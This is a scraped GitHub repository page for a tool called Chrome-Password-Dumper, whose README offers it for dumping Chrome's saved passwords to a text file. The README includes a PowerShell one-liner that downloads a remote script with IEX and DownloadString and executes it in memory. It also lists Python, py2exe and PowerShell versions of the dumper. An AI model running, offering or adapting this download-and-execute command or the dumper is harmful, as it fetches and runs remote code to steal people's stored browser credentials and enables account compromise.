roflsandwich/Chrome-Password-Dumper
2019-09-30 23:18:08
Author: github.com(查看原文)
阅读量:423
收藏
Join GitHub today
GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.
Sign up
No description, website, or topics provided.
PowerShell
Clone or download
Clone with HTTPS
Use Git or checkout with SVN using the web URL.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
README.md
For Windows version simply run chrome.exe to dump the passwords to a text file.
For powershell version:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/roflsandwich/Chrome-Password-Dumper/master/chromev2.ps1')
Chrome must be closed before running the PoC
-
chrome.py uncompiled version
-
chrome.exe - compiled with py2exe
-
chrome.ps1 - powershell version
-
chromev2.ps1 - powershell version with a process check for chrome.
文章来源: https://github.com/roflsandwich/Chrome-Password-Dumper
如有侵权请联系:admin#unsafe.sh